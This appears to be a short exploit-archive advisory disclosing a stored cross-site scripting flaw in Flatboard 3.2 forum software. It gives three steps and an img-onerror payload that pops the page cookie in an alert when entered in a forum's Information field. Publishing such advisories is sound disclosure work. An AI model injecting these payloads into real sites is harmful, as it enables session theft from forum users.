Flatboard 3.2 Cross Site Scripting

2024.06.24

Credit: tmrswrr

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Flatboard v3.2  - Stored XSS
# Date: 2024-06-23
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://flatboard.org/
# Version: 3.2


----------------------------------------------------------------------------------------------------

1-Login admin panel , go to this url : https://127.0.0.1//Flatboard/index.php/forum
2-Click Add Forum and write in  Information field your payload : "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
3-Save it , you will be see alert button

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Flatboard 3.2 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Flatboard 3.2 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.